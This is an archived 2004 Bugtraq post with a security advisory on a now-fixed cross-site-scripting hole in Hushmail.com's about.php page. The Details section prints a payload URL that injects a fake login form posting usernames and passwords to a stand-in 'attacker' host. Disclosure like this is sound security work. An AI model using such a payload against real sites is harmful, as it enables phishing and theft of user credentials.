Multiple vulnerabilities in Hushmail.com

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Hello Bugtraq,

There has been 2 vulnerabilities found in the secure Hushmail.com webmail/data
storage service.
One is a Cross-Site-Scripting vulnerability, and is discussed in the
attached advisory. This has now been fixed.

The second is currently in the progress of being fixed, and because of
this I will not be releasing details until the vulnerability is repaired.
When I do, they will be posted on my website (http://www.fribble.net/security.php)

Cheers,

Calum Power
- Cultural Jammer
- Security Enthusiast
- Hopeless Cynic
http://www.fribble.net
Cross-Site-Scripting vulnerabilities in Hushmail.com website
-------------- 9/03/2004 --------------

Discovered by: Calum Power [Enune]
Versions Affected: <= 8/03/2004
Unaffected versions: 9/03/2004

Vendor:
Hush Communications (www.hush.com)

Product Description:
Hushmail.com is a fast, secure and easy email service. Their products (ranging from basic Webmail to data storage)
are used all over the world (and by some of the world's top security experts) as a means of secure data transfer.


Summary:
Cross-site-scripting vulnerabilities in Hushmail.com website may allow for the manipulation
of data available to users.


Details:
A cross-site-scripting vulnerability exits in the page 'https://www.hushmail.com/about.php'.
By manipulating the 'subsec' HTTP/GET variable, a malicious attacker could manipulate the output
of the about.php script to trick users into believing that a fraudulent page is legitimate.

For example, by manipulating the 'subsec' variable (https://www.hushmail.com/about.php?subsec=)
with the below string, an attacker could cause the Hushmail website to output a form, that may
trick the user into inputting their login information into a web form, which is then sent to a
website of the attackers choice:
https://www.hushmail.com/about.php?subsec=');</script><form action="http://attacker/script.php";>
Username: <input name="user">Password: <input name="pass"></form>


Impact:
The impact of this vulnerability on a company such as Hushmail could be huge, as their products are
marketed as being secure and safe. Attackers could use this vulnerability to 'phish' for user logon details,
and possibly compromise encrypted accounts.

Acknowledgements:
Thanks to the Brian Smith of Hushmail for his speedy response. Hush Communications are definitely dedicated
to providing a top level of security and efficiency to their customers.

Aloha's:
rAchel, Marajin, ValTrum, packetstorm, neworder.box.sk, blacksun.box.sk, Peter Winter-Smith (I like your work =)

[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux